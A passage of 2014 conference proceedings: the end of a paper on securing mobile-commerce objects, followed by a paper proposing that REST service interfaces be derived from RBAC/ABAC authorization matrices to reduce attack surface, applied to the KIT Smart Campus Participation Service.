Nambiar et al. [15] performed an analysis of payment transaction security in mobile commerce. As their research is 10 years old, technologies such as the Wireless Application Protocol (WAP) and Java Micro Edition (J2ME) are no longer considered relevant for modern development. Nonetheless, we consider the use of the SIM Application Toolkit still relevant, although still not used by major vendors, as demonstrated by our previous work [16]. Hughes [17]
provides a comparison between Business-to-Business (B2B)
and Business-to-Consumer (B2C), pointing out which Public
Key Infrastructure (PKI) components are not necessary for a
B2C marketplace. Lam et al. [18] propose lightweight security for mobile commerce transactions. Their proposal is based on public key cryptography and is end-to-end, thus avoiding any insecure intermediate actors. Chang et al. [19] have proposed a secure e-coupon system for mobile users. The requirements Chang proposes are similar to ours, with the difference that we extend them to include duplication, monetary value, multiple use and tracing.
We consider the above research results valuable input for our further research. However, it has to be pointed out that, as these works are relatively old, most of the restrictions they mention are no longer applicable. For example, the computational power of mobile devices, the wireless connectivity, the ease of use of modern smartphones and the capabilities of modern mobile operating systems make it possible to overcome many of the restrictions mentioned a few years ago.
The most significant difference of our solution is that we propose a system that differentiates its approach and security mechanisms depending on the nature of the m-object. The approach is not universal and applied blindly to all objects. That is the reason why we have distinguished and created the different m-object categories.
VIII. DISCUSSION
In this work, we have presented and described our notion
of mobile commerce objects, their use and special
characteristics. We believe that the differentiation that we
propose between these digital representations of goods is a
useful distinction that could be a key enabler for future
mobile commerce systems.
The most significant challenge we had to face was to clearly distinguish between the proposed categories of m-commerce objects. In fact, searching the literature, the notions and terms used are sometimes mixed or may have a double meaning. For example, the difference between promotions and coupons is very delicate and may create confusion.
When dealing with a client-to-server connection, even more so when the client is a mobile device, it is reasonable to face well-known vulnerabilities specific to such an environment. For example, threats like eavesdropping, spoofing, Denial of Service (DoS) and data manipulation have to be dealt with when deploying such a system. We consider the description and further analysis of such threats beyond the scope of this paper; we take, however, into account the results from [20] and [21] in order to deal with them in our future work.
Moreover, in order to avoid some of the human-related vulnerabilities, e.g., having a mobile device stolen, we use secure storage of the m-objects on the user's device, as described in [16] and [22]. In that case, the m-object cannot be retrieved even when the legitimate owner loses his/her device.
Finally, with the use of a mobile device as the main enabler of m-objects, it is evident that connectivity issues may appear. However, with the wide pervasiveness of wireless technologies, both mobile communications and Wi-Fi connections, we consider connectivity and connection speed to be less of a problem and not to influence the client experience.
Our goal with this article is to provide a reference for future use of m-commerce objects and to propose the security and privacy characteristics needed for them. With our distinction, we have made it easier to implement security enhancements for the m-objects, as we provide guidelines on which requirements are needed. We also point out how this approach differs from a classical security solution from both the server and the client side. Our intention is to use the current paper as a reference for our further developments, as described in the section below.
IX. CONCLUSIONS AND FUTURE WORK
In this paper, we have described our concept of m-commerce objects and analyzed security mechanisms that are
required in order to ensure protection and consistency of
their attributes. We have also emphasized security services
that ensure the integrity and authenticity of m-commerce
objects. Those services are provided to all actors in the
system, each having a different motivation and reason for
ensuring the correctness of the objects and transactions.
Moreover, we ensure customers’ privacy by concealing
sensitive information from intermediate parties. Finally, we
refer to the Bitcoin system as a basis of the new paradigm for
use of virtual currencies.
For future work, we plan to use some of the innovative
mechanisms that Bitcoin has introduced for our design and
implementation of the complex security system for the
protection of virtual currencies. Anonymity and traceability
of accounts and transactions are desired features in our
design and implementation. However, they will be combined
with the corresponding security enhancements that will allow
legal entities to intervene in case of illegal transactions and
activities.
REFERENCES
[1] B. Siwicki, "E-commerce and m-commerce: The next five years," internetretailer.com, 28-Apr-2014. [Online]. Available: http://www.internetretailer.com/commentary/2014/04/28/ecommerce-and-m-commerce-next-five-years. [Retrieved: Oct-2014].
[2] I. Kounelis, G. Baldini, S. Muftic, and J. Loschner, "An Architecture for Secure m-Commerce Applications," in 2013 19th International Conference on Control Systems and Computer Science (CSCS), 2013, pp. 519–525.
[3] WordReference, "Promotion." [Online]. Available: www.wordreference.com/definition/promotion. [Retrieved: Jan-2012].
[4] PROMO, "Proximity Marketing Solution." [Online]. Available: http://isin.dti.supsi.ch/NetLab/index.php/promo. [Retrieved: Jan-2012].
[5] Mobile Marketing Association, "Introduction to Mobile Coupons," MMA, 2007.
[6] K. Fujimura and D. Eastlake, "RFC 3506 - Requirements and Design for Voucher Trading System (VTS)," 2003.
[7] "Groupon." [Online]. Available: http://www.groupon.com/. [Retrieved: Feb-2013].
[8] Kansas Statutes Annotated, "Unfair Trade And Consumer Protection: Consumer Protection," 2006.
[9] G. Me, "Security overview for m-payed virtual ticketing," in Personal, Indoor and Mobile Radio Communications, 2003, pp. 844–848.
[10] US General Services Administration, "Pre-paid Card," SmartPay. [Online]. Available: https://smartpay.gsa.gov/about-gsasmartpay/glossary#p. [Retrieved: Feb-2012].
[11] Electronic Merchant Systems, "Loyalty Card." [Online]. Available: http://www.elect-mer.com/glossary-l.html. [Retrieved: Feb-2013].
[12] I. Kounelis, S. Muftic, and J. Loeschner, "Secure and Privacy-Enhanced E-Mail System Based on the Concept of Proxies," presented at the 37th International Convention on Information and Communication Technology, Electronics and Microelectronics - MIPRO, 2014, pp. 1405–1410.
[13] "Bitcoin - Open source P2P money." [Online]. Available: https://bitcoin.org/en/. [Retrieved: May-2014].
[14] Z. Muadh, "Introduction To Sidechains and Blockchain 2.0," Deep Dot Web. [Online]. Available: http://www.deepdotweb.com/2014/06/26/sidechains-blockchain-20/. [Retrieved: Oct-2014].
[15] S. Nambiar, C.-T. Lu, and L. R. Liang, "Analysis of payment transaction security in mobile commerce," in Proceedings of the 2004 IEEE International Conference on Information Reuse and Integration, IRI 2004, 2004, pp. 475–480.
[16] I. Kounelis, H. Zhao, and S. Muftic, "Secure Middleware for Mobile Phones and UICC Applications," in Mobile Wireless Middleware, Operating Systems, and Applications, vol. 93, Berlin, Heidelberg: Springer Berlin Heidelberg, 2012, pp. 143–152.
[17] J. Hughes, "Enabling E-Commerce Through PKI," Netw. Secur., vol. 2000, no. 3, Mar. 2000, pp. 14–16.
[18] K.-Y. Lam, S.-L. Chung, M. Gu, and J.-G. Sun, "Lightweight security for mobile commerce transactions," Comput. Commun., vol. 26, no. 18, Dec. 2003, pp. 2052–2060.
[19] C. C. Chang, C. C. Wu, and I. C. Lin, "A Secure E-coupon System for Mobile Users," Jan. 2006.
[20] D. Geneiatakis, I. Kounelis, J. Loeschner, I. N. Fovino, and P. Stirparo, "Security and Privacy in Mobile Cloud Under a Citizen's Perspective," in Cyber Security and Privacy, M. Felici, Ed. Springer Berlin Heidelberg, 2013, pp. 16–27.
[21] I. Kounelis, J. Loschner, D. Shaw, and S. Scheer, "Security of service requests for cloud based m-commerce," in 2012 Proceedings of the 35th International Convention MIPRO, 2012, pp. 1479–1483.
[22] F. Zhang, I. Kounelis, and S. Muftic, "Generic, Secure and Modular (GSM) Methodology for Design and Implementation of Secure Mobile Applications," presented at the SECURWARE 2012, The Sixth International Conference on Emerging Security Information, Systems and Technologies, 2012, pp. 1–6.
Attack Surface Reduction for Web Services based on Authorization Patterns
Roland Steinegger, Johannes Schäfer, Max Vogler, and Sebastian Abeck
Research Group Cooperation & Management (C&M)
Karlsruhe Institute of Technology (KIT)
Karlsruhe, Germany
{ abeck, steinegger }@kit.edu, { johannes.schaefer, max.vogler }@student.kit.edu
Abstract—During the design of a security architecture for a web application, the usage of security patterns can assist in fulfilling quality attributes, such as increasing reusability or safety. The attack surface is a common indicator for the safety of a web application; thus, reducing it is a problem during design. Today's methods for attack surface reduction are not connected to security patterns and have an unknown impact on quality attributes, e.g., they may come with an undesirable trade-off in functionality. This paper introduces a systematic and deterministic method to reduce the attack surface of web services by deriving service interface methods from authorization patterns. We applied the method to the Participation Service that is part of the KIT Smart Campus system. The resulting RESTful web services of the application are presented and validated.
Keywords-security pattern, attack surface, authorization, web service, REST
I. INTRODUCTION
Every web application has assets, e.g., web services, needing protection from threats. Thus, securing web applications is a major issue. Security must be considered during the whole software development life cycle to build secure software [1]. In such a security-based software development life cycle, security patterns are used during the design phase to solve common security problems and build a security architecture [2].
Security patterns in the security architecture can have an impact on non-security quality attributes of the whole software system, such as loose coupling or discoverability [2]. When using security patterns, it is helpful to know this influence on the quality of the application [3]. Additionally, security should be applied as early as possible to increase overall security [3]. Developers are generally not security experts, and a systematic approach can help them reach quality requirements [4]. Regarding a concrete quality attribute, the attack surface, several metrics have been introduced to measure the attack surface of whole software systems [5], object-oriented designs [3][6] and web applications [7].
In addition to metrics, there are methods to reduce the attack surface, e.g., by using the Top 10 most critical application security flaws of the Open Web Application Security Project (OWASP) [8], by removing or disabling less important or unnecessary functionality [9][10], or by reducing the permissions of the application [11]. These methods do not offer the possibility to systematically reduce the attack surface and they do not describe their influence on
other quality attributes. Additionally, there is no connection to security patterns that are commonly used in a security-based development process.
Thus, we propose a method based on security patterns for authorization to reduce the attack surface of web services. The method has a direct impact on the service interface. It mainly focuses on web services having a manageable amount of authorization rules that do not change periodically. It reduces the attack surface by reducing the privileges for methods on the interface to the minimum needed, according to authorization. Furthermore, the client can choose under which privilege a service interface method should be called. Both increase security by following the principle of least privilege and secure interaction design [12]. Our approach additionally leads to service interfaces which are compliant with the Representational State Transfer (REST) paradigm [13].
The method is applied to the Participation Service of the KIT Smart Campus system. The service uses Attribute-Based Access Control (ABAC) for authorization due to complex security requirements. The resulting web services of the Participation Service are introduced. The web services are analyzed using the attack surface metric of [7].
The article is structured as follows: First, the needed background and related work are introduced in Section II. The approach is presented in Section III for two commonly used authorization patterns. Section IV shows the evaluation of the approach by applying it to the Participation Service. After the evaluation, Section V discusses limitations of the approach. The paper gives conclusions and an outlook on future work in Section VI.
II. BACKGROUND AND RELATED WORK
In this section, the needed background for our approach
is presented. This includes the software system used for
evaluating the approach, the Participation Service, security
patterns used for our approach, and related work on the
attack surface, as well as on REST and its constraints.
A. Participation Service of the KIT Smart Campus
The KIT Smart Campus (KIT-SC) system is a web application developed at the Karlsruhe Institute of Technology (KIT). A detailed description of the KIT-SC and its features is given in [14]. The KIT-SC pursues the goal of supporting students and employees in learning, teaching and other activities related to the KIT campus.
The Participation Service represents a part of the KIT-SC. It provides a forum with voting and discussion features.
Following the principles of systemic consensus, this enables
groups of users to make decisions on campus-related issues
by using the modern, responsive web application.
B. Security patterns for authorization
With our approach, service interfaces are derived from
authorization patterns. The steps are shown for two common
security patterns: Role-Based Access Control (RBAC) and
ABAC.
RBAC takes advantage of the fact that organizations are often structured in roles, e.g., students, employees and administration [2]. These roles have certain rights and duties. The rights of these roles can be used to model the access rights in the system. Thus, subjects get all rights through their roles. In this way, the process of assigning access rights is simplified by the usage of global roles instead of individual rights [2].
Figure 1 shows the structure of RBAC. Subjects have certain roles and these roles are directly connected with resources. The concrete right is associated with the connection between role and resource. As soon as roles are not applicable or a more flexible access control is required, RBAC has strong limitations [15].
ABAC is a more flexible approach because it uses attributes as the information source for access control [15]. In addition to static roles, which can still be realized with ABAC, access control can be defined for dynamic attribute combinations of subjects, resources and environments [15]. Figure 2 shows this structure. Subjects are directly connected to resources. The right is associated with this connection and uses the attributes.
Yuan et al.'s formal definition [15] is: S, R and E are
subjects, resources and environments with pre-defined
attribute sets SAn, RAn and EAn. A policy rule that decides whether a subject s can access a resource r in an environment e is a Boolean function of the attributes of s, r and e:
canAccess(s, r, e) ← f(ATTR(s), ATTR(r), ATTR(e))
where ATTR() is a function that assigns every currently
valid attribute to a subject, resource or environment.
Authorization using ABAC is thus more fine-grained than RBAC. On the negative side, it is more complex to implement.
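A minimal sketch of such a canAccess() function, with attributes modeled as plain dictionaries and an invented example policy (both are our own simplifications, not part of Yuan et al.'s definition):

```python
def can_access(subject: dict, resource: dict, environment: dict) -> bool:
    """Boolean policy rule over the attributes of s, r and e."""
    # Example policy (invented): employees may access confidential
    # resources, but only during business hours.
    return (
        subject.get("role") == "employee"
        and resource.get("classification") == "confidential"
        and 8 <= environment.get("hour", 0) < 18
    )

assert can_access({"role": "employee"}, {"classification": "confidential"}, {"hour": 10})
assert not can_access({"role": "guest"}, {"classification": "confidential"}, {"hour": 10})
assert not can_access({"role": "employee"}, {"classification": "confidential"}, {"hour": 22})
```

Unlike a static role check, the decision here combines subject, resource and environment attributes, which is what makes ABAC more fine-grained.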
C. Attack Surface
With our approach, we connect security patterns with
software product quality according to ISO/IEC 25010 [16].
These are on the one hand the quality attribute attack surface
and on the other hand quality attributes connected to the
REST paradigm. In this section, we introduce the attack
surface.

Figure 1. Scheme of the Role-Based Access Control based on [17]

Figure 2. Scheme of the Attribute-Based Access Control based on [17]
Developers wish to anticipate the vulnerability of their
software system prior to deployment. The popular concept of
loose coupling and the distribution of systems or web
applications lead to an increasing number of interfaces [18].
These are natural security boundaries that augment the attack
surface, an indicator for measuring a system’s vulnerability
towards external attacks [7][9].
The attack surface does not give information on code quality or high-value architectural design. Neither does a large attack surface imply that a system has many vulnerabilities, nor does a small attack surface mean few vulnerabilities. But a large attack surface indicates that an attacker presumably needs less effort to exploit vulnerabilities [5]. The reduction of the attack surface therefore reduces the overall security risk, which is the product of the probability of a hazardous event, the vulnerability to it and the value of the asset: Risk = Threat × Vulnerability × Asset Value [19]. Think of two web applications with similar functionality and value: the one with the larger attack surface is the more likely target.
We use the attack surface metric for web applications [7] to evaluate our approach. The metric is based on parameters grouped into parameter families. These parameter families are Degree of Distribution, Dynamic Creation, Security Features, Input Vectors, Active Content, Cookies and Access Control. Parameters are, e.g., Role and Privileges for the parameter family Access Control. A value is assigned to each of the parameters, depending on the application. The higher the value, the greater the attack surface and the higher the risk for attacks; e.g., accessing the application as an unauthenticated user has value 0, whereas accessing it as an authenticated or root user has value 5 or 10, respectively. The value of each parameter family is the Euclidean norm of the values of the parameters in the family, and the overall metric is the Euclidean norm of the family values. The maximum attack surface is 60.79.
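The nested Euclidean-norm calculation can be sketched as follows; the families and parameter values here are illustrative only and are not taken from the catalogue of [7]:

```python
import math

def euclidean_norm(values) -> float:
    return math.sqrt(sum(v * v for v in values))

# Illustrative parameter values per family (not the metric of [7]).
families = {
    "Access Control": [5, 10],  # e.g., authenticated user, root user
    "Input Vectors": [3, 4],
}

# Family value = norm of its parameter values;
# overall metric = norm of the family values.
family_values = [euclidean_norm(v) for v in families.values()]
attack_surface = euclidean_norm(family_values)
print(round(attack_surface, 2))  # → 12.25
```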
In the next sections, we discuss methods for reducing the attack surface with regard to our goals and service interface design. The author of [9] suggests several methods for reducing the attack surface of an operating system. His 80/20 rule (following the Pareto principle) to reduce the amount of running code contradicts our goal not to reduce functionality. Further, he offers no systematic way to find
code to remove. The methods for applying least privileges and reducing access for untrusted users mainly focus on the system running the application. In line with this method, we suggest that for service interfaces least privilege also means reducing the number of accessible operations. Authorization defines who shall access operations and is, therefore, our starting point for securing access by reducing the attack surface.
Reference [10] introduces an approach for removing or disabling unused code in operating systems. This corresponds to finding the 20 percent in the 80/20 rule of [9] and therefore aims to reduce functionality. The general approach consists of two phases, analysis and enforcement. In the analysis phase, unused code is found. The enforcement phase aims to prevent execution of unused code. Unused code is identified by running the application and executing all available methods. Thus, this approach needs a running application and is first applicable in the implementation phase. We think that seldom-used or unused code could be avoided by considering security earlier.
Methods for reducing the attack surface of a web application based on the Top 10 vulnerabilities published by the OWASP are introduced in [8]. The authors use security measures mitigating these vulnerabilities. The Top 10 entries are related to security vulnerabilities in web applications and therefore do not have to be connected to the attack surface. Thus, not all of the applied measures, such as input validation and secret tokens, affect the attack surface directly. A systematic way to reduce the attack surface needs to ensure this reduction.
The discussed approaches aim to reduce the attack surface in several ways. They do not offer a systematic way with concrete transformations to reduce the attack surface. Often the functionality of the application is reduced to ensure a smaller attack surface. Using security patterns is not part of any of these approaches. We tackle these limitations with our approach.
D. Web Services based on REST
According to the W3C, the term web service refers to a software system designed to support interoperable machine-to-machine interaction over a network [21][20]. It is frequently regarded more as a system's function of providing web access to its inner purpose rather than as the whole system itself. Furthermore, a web application consists of web services; e.g., the web browser uses web services.
The W3C distinguishes two types of web services: those using REST-compliant interfaces and those providing arbitrary access [20]. While the latter have been primarily used in the past, presumably because of the ease of implementation, RESTful interfaces have become increasingly popular, mainly for their lightweight and universal deployment [21].
REST is an architectural style for the communication of
web services proposed by Fielding [13]. It relies on existing
standards, such as the Hypertext Transfer Protocol (HTTP), and defines six constraints for RESTful interfaces rather than concrete implementation specifications: the Client-Server principle, the concept of statelessness, the usage of a cache, the uniformity of the interface, the layered system and the optional Code-On-Demand feature [13].
The uniform interface is the centerpiece of the REST architectural style: the interface describes every aspect through resources. Every resource is identified by a unique address, which is in most cases a URI. Those resources are retrieved or manipulated via representations, on which a set of valid operations is available. Requests and responses are self-descriptive, and semantics and hypermedia are used to describe them [13]. Hereby, a high degree of universality is achieved. However, it comes with a compromise in efficiency, since the standardized information transfer leads to an overhead [21].
Since our approach alters the operations allowed on the resources, the compliance of the new interface with the uniformity concept is the focus of validation.
III. DERIVING SERVICE INTERFACE METHODS FROM AUTHORIZATION PATTERNS
In this section, we introduce our method to reduce the attack surface. We developed the approach based on the following assumptions and formulated goals 1 to 6. First, current methods for attack surface reduction have unacceptable deficits, such as decreasing functionality (goals 1 and 4). Second, non-security experts must be able to apply the method and ensure security [4] (goal 2). Third, the method must be applicable at an early stage [3] (goal 3) and on the KIT Smart Campus (goals 5, 6).
1. Security patterns shall be connected to software product quality not related to security.
2. A systematic way shall ensure certain quality attributes, including the attack surface.
3. The method shall be applicable in an early software development phase.
4. The method shall not reduce application functionality.
5. The method shall be applicable on web applications.
6. It shall apply for web services similar to the RESTful web services of the Participation Service.
Before introducing the method, we align the term attack surface with ISO/IEC 25000 and 25010. The attack surface is an inherent characteristic of software, because it can be measured with the several metrics introduced above. Thus, speaking in the language of ISO/IEC 25000 [22], it is a software quality attribute. We suggest assigning it to the quality characteristic freedom from risk and its sub-characteristic economic risk mitigation according to ISO/IEC 25010 [16]. Therefore, it belongs to the quality in use model.
Concerning the method, the starting point is the
authorization of the application and corresponding security
patterns. These patterns describe who can access resources
in which way. Thus, authorization can be used to reduce the
attack surface to exactly the functionality that shall be
offered. Regarding the metric for web applications
introduced in [7], our approach reduces the parameter family
of access control. Other parameter families are not
influenced by the approach and, thus, a reduction is ensured.
Our approach consists of the following three steps:
1.
2.
3.
Set up an access control matrix.
Derive services from the access control matrix.
Create REST-compliant web services based on the
derived services.
The access matrix of the first step contains resources and operations as columns and policy rules as rows. For every operation allowed by a policy rule, the corresponding table cell is filled with a dot; see Table 1, Table 2 and Table 3 as examples. In the second step, a web service is introduced for each resource. Its service interface has an operation for every column whose cell is marked in at least one row; Figure 3 is an example of this. In the last step, the resulting web services are mapped to REST-compliant web services. Each step is introduced in the next sections. First, the main idea of deriving technology-independent web services and their service interfaces is explained in depth. Second, the mapping from the abstract web service to a REST-compliant web service is described.
A. Deriving Abstract Service Interfaces from Role-Based Access Control
A role-based scheme for access control with n different resources and m roles can be depicted as a two-dimensional matrix (see the example in Table 1). With the REST paradigm's resource-oriented interface style kept in mind, we assume that four operations are possible per resource: creating, retrieving, updating and deleting (CRUD). A bullet indicates that the specified role is allowed to use the specified operation on the specified resource.
While in an ordinary RESTful implementation the interface would provide access for all roles to all operations on all resources, our approach aims to reduce the overall number of accessible operations to a minimum. In the context of Table 1, this leads to a reduction of the attack surface by the number of unfilled table cells.

TABLE I. EXEMPLARY MATRIX FOR RBAC WITH ROLES (rows: Role #1 to Role #3; columns: the CRUD operations on Resource #1 and Resource #2; a bullet marks an allowed operation)

TABLE II. EXEMPLARY MATRIX FOR ABAC WITH EXPRESSIONS (rows: the policy expressions attribute1(r), !attribute2(r) and attribute2(r) ∧ attribute3(r) of canAccess(s, r, e); columns: the CRUD operations on Resource #1 and Resource #2; a bullet marks an allowed operation)

Resource1Service
+ createAsAttribute2AndAttribute3(): Response
+ readAsAttribute1(): Response
+ readAsAttribute2AndAttribute3(): Response
+ readAsNotAttribute2(): Response
+ updateAsAttribute2AndAttribute3(): Response
+ updateAsNotAttribute2(): Response

Figure 3. Entity Service for Resource #1 of Table 2

Copyright (c) IARIA, 2014. ISBN: 978-1-61208-376-6
This is achieved by the creation of additional methods: usually, one method is implemented for each operation on a resource. With our approach, methods are not only generated per operation but per operation and role (GetAsRole1, GetAsRole2, GetAsRole3, PostAsRole1, etc.). The difference is that each method can validly be used by exactly one role rather than by all possible roles. So far, the attack surface stays the same. The reduction is then achieved by not implementing those methods that do not have a bullet in the access control matrix of, e.g., Table 1.
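To illustrate, the per-role method derivation from an RBAC matrix can be sketched as follows. The matrix encoding, values and helper names are ours, not taken from the paper; a real implementation would generate service stubs rather than a list of names.

```python
# Sketch: derive per-role interface methods from an RBAC access control
# matrix. Only marked (allowed) cells become methods, so the number of
# callable operations equals the number of bullets in the matrix.

OPS = ["Create", "Read", "Update", "Delete"]

# Access control matrix for one resource: role -> set of allowed operations.
# (Illustrative values, not the exact cells of Table 1.)
matrix = {
    "Role1": {"Read"},
    "Role2": {"Create", "Read"},
    "Role3": {"Read", "Update"},
}

def derive_methods(matrix):
    """One method per marked cell, e.g. 'readAsRole1'."""
    methods = []
    for role, allowed in sorted(matrix.items()):
        for op in OPS:
            if op in allowed:
                methods.append(f"{op.lower()}As{role}")
    return methods

print(derive_methods(matrix))
# A traditional interface would expose len(matrix) * len(OPS) = 12
# operations; here only the 5 marked cells are reachable.
```

The attack-surface reduction corresponds directly to the unfilled cells: the unmarked operations are simply never generated.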
B. Deriving Abstract Service Interfaces from Attribute-Based Access Control
Applying the approach to ABAC extends the principles of its application to RBAC. In the first step, all applicable operations for each resource of R are listed as columns in the access control matrix. Every policy rule of the canAccess() function is listed as a row. Every cell for which the canAccess() function evaluates to true is marked. A possible result is shown in Table 2.
Deriving the interface from Table 2 works similarly to the role-based approach: a service interface is created for each resource. In every service, operations are created for every allowed operation. Example operations from Table 2 are readIfIsAttribute1, updateIfIsNotAttribute2 and deleteIfIsAttribute2AndAttribute3 (see Figure 3). To prevent long and complicated method names, it is best practice to derive canAccess() rules from single attributes only whenever possible.
C. Application on Authorization Patterns
Sections III.A and III.B show how service interface methods can be derived for RBAC and ABAC. This section shows that the method is applicable to any kind of authorization.
In the sections on RBAC and ABAC, there are two limitations. First, the service interface methods are derived from access control matrices for RBAC and ABAC. Second, because of the scenario and REST compliance, we used entity services [23] with only basic CRUD operations. Neither limitation is necessary, and both can be generalized.
Concerning the first limitation, the abstract security pattern Authorization defines who may access protected resources in which way [2]. The access control matrix contains the description of the entity (who) in the first column of a row, the resource to access (what) on top of the column, and the way the resource shall be accessible below the resource. Therefore, an access control matrix, as used before, can be created for every kind of authorization. Deriving the abstract service interfaces from these access control matrices can be achieved as previously shown: create a service interface for each resource, with one operation per permission. The names of the operations can be of any kind; thus, not only CRUD operations are applicable.
D. Maintaining REST Compliance
In order to comply with the previously presented REST constraints, we propose not to realize the derived service interface methods as additional HTTP operations. Quite the contrary: REST relies on a defined and pre-known set of operations – namely GET, POST, PUT, DELETE, etc. when using HTTP. Introducing new operations restricts the API usage to insiders and thus adversely affects the interface's uniformity and universality. It is also hardly possible in practice when using HTTP, since custom methods are not supported by browsers or most clients [21].
It is furthermore not advisable to realize the derived methods using custom HTTP headers. Sending an "X-Role: Administrator" header with every request seems practical at first sight. But whitelist-based firewalls and proxy servers will strip such custom headers [24], limiting the API usage to clients that do not rely on a firewall. This kind of limitation is not acceptable.
However, a third way exists: we propose adding the service operation name to the request URI. HTTP requests using the examples from above could then look like this:
POST /resource1/?authorization=createAsRole3
DELETE /resource2/?authorization=deleteAsRole3
…
GET /resource1/?authorization=readIfIsAttribute1
PUT /resource1/?authorization=updateIfNotAttribute2
…
This is legal according to the HTTP standard and does not violate the uniform interface constraint of REST. The server extracts the information from the parameter – a task possible with every framework and scripting language.
Diligence is required in the implementation: the parameter must not have a fallback for an invalid or missing value. In that case, an error has to be thrown. Otherwise, the attack surface is not reduced, for the simple reason that the implementation then does not differ from the traditional one.

TABLE III. ACCESS CONTROL MATRIX OF USER AND GROUP RESOURCES OF THE PARTICIPATION SERVICE

                         User            Group
canAccess(s, r, e)       C  R  U  D      C  R  U  D
Guest(s)                 ●  -  -  -      -  -  -  -
Authenticated(s)         -  ●  -  -      ●  ●  -  -
User(s) = r              -  -  ●  -      -  -  -  -
User(s) = Owner(r)       -  -  -  -      -  -  ●  -
Admin(s)                 -  ●  ●  -      -  ●  ●  -

UserService
+ createIfIsGuest(): String
+ readIfIsAdmin(): String
+ readIfIsAuthenticated(): String
+ updateIfIsAdmin(): String
+ updateIfUserIsResource(): String

GroupService
+ createIfIsAuthenticated(): String
+ readIfIsAdmin(): String
+ readIfIsAuthenticated(): String
+ updateIfIsAdmin(): String
+ updateIfUserIsOwner(): String

Figure 4. User and Group Service derived from the access control matrix shown in Table 3
An appropriate error communication for this case, and for the case of using a permission that is not allowed on the specific resource, is to respond with HTTP status 405 Method Not Allowed. At first sight it seems uncommon to respond with a method-related error code to a missing or incorrectly specified parameter. However, as the parameter is merely an extension of the method according to the approach of this paper, it is suitable here. The list of "allowed methods" (more precisely: method and value for the authorization parameter) can be supplied in the body of the HTTP response. As a result, it is possible to follow the Hypertext-As-The-Engine-Of-Application-State (HATEOAS) paradigm.
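A minimal sketch of this dispatch, under our own assumptions about the routing table layout and handler names (none of which come from the paper): the authorization parameter has no fallback, and an unknown or missing value yields 405 together with the list of valid method/parameter combinations.

```python
# Sketch: dispatch on the 'authorization' query parameter with no fallback.
# An unknown or missing value yields 405 Method Not Allowed plus the list
# of valid method/parameter combinations, supporting HATEOAS.

# Whitelist: (HTTP method, resource path, authorization value) -> handler.
ROUTES = {
    ("POST", "/resource1/", "createAsRole3"): "handle_create_as_role3",
    ("GET", "/resource1/", "readIfIsAttribute1"): "handle_read_if_attribute1",
    ("PUT", "/resource1/", "updateIfNotAttribute2"): "handle_update_if_not_attribute2",
}

def dispatch(method, path, authorization):
    handler = ROUTES.get((method, path, authorization))
    if handler is None:
        # No fallback: respond 405 and advertise the allowed combinations.
        allowed = sorted(f"{m} ?authorization={a}"
                         for (m, p, a) in ROUTES if p == path)
        return 405, allowed
    return 200, handler

print(dispatch("GET", "/resource1/", "readIfIsAttribute1"))
# (200, 'handle_read_if_attribute1')
print(dispatch("GET", "/resource1/", None))
# (405, list of the three allowed method/parameter combinations)
```

Because unmatched requests fall through to a hard 405 rather than a generic handler, the attack surface stays limited to the whitelisted operations.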
IV. EVALUATION
In this section, we apply the method to the Participation Service of the KIT-SC system, show the resulting web services and give an evaluation. The Participation Service was developed by seven students during a practical course at the KIT. The group was divided into two teams, one focusing on the HTML 5 frontend and the other focusing on the Java backend.
At the beginning, the requirements for the service were collected. All required subjects S, resources R, environments E and their attributes SAn, RAn and EAn were identified, and the access control matrix was built. Possible subjects are anonymous users and authenticated users. This publication demonstrates the method on the User and Group resources only, leaving out all other resources of the Participation Service for the sake of brevity.
According to the requirements, both users and groups can be created, edited and displayed. Deletion is handled by setting a status flag to deactivated, i.e., by updating the resource. The access control matrix in Table 3 shows the authorization rules based on ABAC. Users can be created by guests. An authenticated user can read user account data and can create and read groups. The owner of a user or group account can update its information. Users with the admin flag are allowed to read and update users and groups.
Figure 4 shows the abstract service interfaces derived from the access control matrix of Table 3. For each resource, a service is modeled with the operations according to the access control matrix. This implies that the services do not have operations for deleting the resources, because no authorization rule exists for this operation. Typically, the delete operation would still be implemented, but be inaccessible due to the enforced authorization. According to [9], this mapping is a reduction of the attack surface.
The abstract service interfaces are then mapped to the
REST services with URLs as follows:
For the User Service:
POST /user/?authorization=createIfIsGuest
GET /user/?authorization=readIfIsAdmin
GET /user/?authorization=readIfIsAuthenticated
PUT /user/?authorization=updateIfIsAdmin
PUT /user/?authorization=updateIfUserIsResource
For the Group Service:
POST /group/?authorization=createIfIsAuthenticated
GET /group/?authorization=readIfIsAdmin
GET /group/?authorization=readIfIsAuthenticated
PUT /group/?authorization=updateIfIsAdmin
PUT /group/?authorization=updateIfUserIsOwner
The Spring Security project was chosen to enforce the authentication and authorization of the KIT-SC. Authorization is implemented by adding the annotation PreAuthorize to each entry point of the corresponding URL. These annotations contain the access policies as Spring EL expressions, which are evaluated by Spring Security to enforce access control. Spring EL offers the possibility to state expressions on the attributes of resource and subject. Thus, the parameters delivered in the request, introduced by our method, can be used to formulate the Spring EL statement.
Using the approach of this paper in combination with Spring Security proved to be a good choice for several reasons.
The attack surface metric of [7] has been improved: the parameter rights of the parameter family access control have been reduced from 10 to 0 or 5, depending on the privileges of the operation.
Moreover, enforcing the authorization is easier, because testing functionality and the access decision can be combined. For example, consider the third row of Table 3: the user shall only be able to update his own account. This constraint can be implemented and tested quite easily. Furthermore, to enforce this policy, only the ownership has to be validated, which is straightforward because the user data is delivered in the request. Without this limitation, the information would have to be collected separately. Thus, with a generic update operation, every policy would have to be enforced, and the corresponding data fetched, for each user touched by an operation call.
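The ownership policy from the third row of Table 3 can be sketched in isolation; the function and store names below are ours, and the snippet only mirrors the check that the derived operation updateIfUserIsResource has to perform:

```python
# Sketch: enforcing the policy "User(s) = r" (third row of Table 3) for the
# derived operation updateIfUserIsResource. Because the authorization is
# tied to this single operation, only the ownership has to be validated.

def update_if_user_is_resource(subject_id, resource_id, new_data, store):
    if subject_id != resource_id:   # policy: subject must be the resource
        return 405                  # permission not allowed here -> error
    store[resource_id] = new_data
    return 200

store = {"alice": {"mail": "old@example.org"}}
print(update_if_user_is_resource("alice", "alice",
                                 {"mail": "new@example.org"}, store))  # 200
print(update_if_user_is_resource("bob", "alice", {}, store))          # 405
```

Because the policy is encoded in exactly one operation, a unit test of this function covers both the functionality and the access decision at once.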
Additionally, frontend developers benefited from
associating the authorization to HTML forms, buttons and
links. By choosing which operation to call, they get
sensitized to security. Following the principles of secure
interaction design [12], they added confirmation messages,
warnings, colors and icons to the user interface according to
the security level of the different operations used.
V. LIMITATIONS
